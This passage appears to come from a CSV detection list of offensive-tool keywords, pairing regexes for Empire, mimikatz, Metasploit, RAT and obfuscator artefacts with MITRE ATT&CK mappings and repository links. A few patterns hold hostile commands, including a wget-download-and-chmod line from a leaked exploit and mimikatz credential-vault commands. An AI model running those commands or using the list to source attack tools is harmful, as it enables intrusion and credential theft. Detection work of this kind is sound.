T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*usestager *launcher_lnk*",".{0,1000}usestager\s.{0,1000}launcher_lnk.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - 
T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*usestager *shellcode*",".{0,1000}usestager\s.{0,1000}shellcode.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*usestager multi/launcher*",".{0,1000}usestager\smulti\/launcher.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration 
Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*using donutCS*",".{0,1000}using\sdonutCS.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*using KrbRelayUp.*",".{0,1000}using\sKrbRelayUp\..{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*using 
NixImports*",".{0,1000}using\sNixImports.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*using SharpExfiltrate*",".{0,1000}using\sSharpExfiltrate.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*using SharpUp.Classes*",".{0,1000}using\sSharpUp\.Classes.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*using SharpView.Enums*",".{0,1000}using\sSharpView\.Enums.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*using SMBeagle*",".{0,1000}using\sSMBeagle.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*using static BackupCreds.Interop*",".{0,1000}using\sstatic\sBackupCreds\.Interop.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*using static SharpUp.Utilities*",".{0,1000}using\sstatic\sSharpUp\.Utilities.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*Using VirusToal website as external C2*",".{0,1000}Using\sVirusToal\swebsite\sas\sexternal\sC2.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*UsoDllLoader*",".{0,1000}UsoDllLoader.{0,1000}","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. 
It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","1","N/A","N/A","4","371","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" "*usr/bin/wget -O /tmp/a http* chmod 755 /tmp/cron*",".{0,1000}usr\/bin\/wget\s\-O\s\/tmp\/a\shttp.{0,1000}\schmod\s755\s\/tmp\/cron.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*usr/share/seclists*",".{0,1000}usr\/share\/seclists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*usr/src/rusthound rusthound *",".{0,1000}usr\/src\/rusthound\srusthound\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*util.nimplant*",".{0,1000}util\.nimplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" 
"*util/dot_net_deserialization/*",".{0,1000}util\/dot_net_deserialization\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*utils/payloads.db*",".{0,1000}utils\/payloads\.db.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","10","N/A","N/A","N/A","N/A" "*Utils\Posh.cs*",".{0,1000}Utils\\Posh\.cs.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" 
"*UTJzMVVGZ3diRkZZTUdoUVZURlJaMUJUUVc1YU1qbDJXako0YkZreWFIbGlNakZzV1ZoV01HSjVOWHBhV0VveVdsZHNlVmw1TldwaU1qQnVRMnQ0U1ZReFRsVkpSREJuU25wRk5VMXBOSGhPYW1kMVRWTTBla3AzY0UxVlJUbFRWa05CT1VsRVVUQk5kM0JWVTFVeFJsZ3hUazFTVlZaUlNVUXdaMDFVUVV0RGJGSkdWRlpDWmxWRlJsVlRRMEU1U1VoU2JHSllRbTFoVjN*",".{0,1000}UTJzMVVGZ3diRkZZTUdoUVZURlJaMUJUUVc1YU1qbDJXako0YkZreWFIbGlNakZzV1ZoV01HSjVOWHBhV0VveVdsZHNlVmw1TldwaU1qQnVRMnQ0U1ZReFRsVkpSREJuU25wRk5VMXBOSGhPYW1kMVRWTTBla3AzY0UxVlJUbFRWa05CT1VsRVVUQk5kM0JWVTFVeFJsZ3hUazFTVlZaUlNVUXdaMDFVUVV0RGJGSkdWRlpDWmxWRlJsVlRRMEU1U1VoU2JHSllRbTFoVjN.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*v1k1ngfr.github.io/fuegoshell/*",".{0,1000}v1k1ngfr\.github\.io\/fuegoshell\/.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*v1k1ngfr/fuegoshell*",".{0,1000}v1k1ngfr\/fuegoshell.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*V3n0M-Scanner*",".{0,1000}V3n0M\-Scanner.{0,1000}","offensive_tool_keyword","V3n0M-Scanner","V3n0M is a free and open source scanner. 
Evolved from baltazars scanner. it has adapted several new features that improve fuctionality and usability. It is mostly experimental software. This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at your own risk.","T1210.001 - T1190 - T1191 - T1595","TA0007 - TA0002 - TA0008 - TA0010","N/A","N/A","Web Attacks","https://github.com/v3n0m-Scanner/V3n0M-Scanner","1","1","N/A","N/A","10","1419","411","2023-11-14T23:05:16Z","2013-10-21T06:05:17Z" "*v4d1/Dome*",".{0,1000}v4d1\/Dome.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "*valid_user@contoso.com:Password1*",".{0,1000}valid_user\@contoso\.com\:Password1.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*vanhauser-thc/thc-hydra*",".{0,1000}vanhauser\-thc\/thc\-hydra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*vault::*",".{0,1000}vault\:\:.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - 
T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*vault::cred*",".{0,1000}vault\:\:cred.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*vault::list*",".{0,1000}vault\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*VBA Obfuscation Tools combined with an MS office document generator*",".{0,1000}VBA\sObfuscation\sTools\scombined\swith\san\sMS\soffice\sdocument\sgenerator.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "*Vbad/VBad.py*",".{0,1000}Vbad\/VBad\.py.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. 
It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "*vba-macro-mac-persistence.vbs*",".{0,1000}vba\-macro\-mac\-persistence\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*VBA-RunPE -*",".{0,1000}VBA\-RunPE\s\-.{0,1000}","offensive_tool_keyword","VBA-RunPE","A simple yet effective implementation of the RunPE technique in VBA. This code can be used to run executables from the memory of Word or Excel. It is compatible with both 32 bits and 64 bits versions of Microsoft Office 2010 and above.","T1055 - T1218 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/itm4n/VBA-RunPE","1","0","N/A","N/A","8","777","179","2019-12-17T10:32:43Z","2018-01-28T19:50:44Z" "*vba-windows-persistence.vbs*",".{0,1000}vba\-windows\-persistence\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*vbs_obfuscator.vbs*",".{0,1000}vbs_obfuscator\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 
- T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*vbs_ofuscator.vbs*",".{0,1000}vbs_ofuscator\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*vbs-obfuscator.py*",".{0,1000}vbs\-obfuscator\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*VbulletinWidgetTemplateRce.py*",".{0,1000}VbulletinWidgetTemplateRce\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*vcenter_forge_saml_token*",".{0,1000}vcenter_forge_saml_token.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*vcenter_secrets_dump.*",".{0,1000}vcenter_secrets_dump\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*vcenter_secrets_dump.rb*",".{0,1000}vcenter_secrets_dump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*vcsmap*",".{0,1000}vcsmap.{0,1000}","offensive_tool_keyword","vcsmap","vcsmap is a plugin-based tool to scan public version control systems (currently GitHub and possibly Gitlab soon) for sensitive information like access tokens and credentials.","T1210.001 - T1190 - T1538","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/melvinsh/vcsmap","1","0","N/A","N/A","2","134","23","2021-08-31T20:47:07Z","2016-08-21T11:23:57Z" "*vdi2john.pl*",".{0,1000}vdi2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*VectorKernel\BlockNewProc*",".{0,1000}VectorKernel\\BlockNewProc.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*VectorKernel\CreateToken*",".{0,1000}VectorKernel\\CreateToken.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques 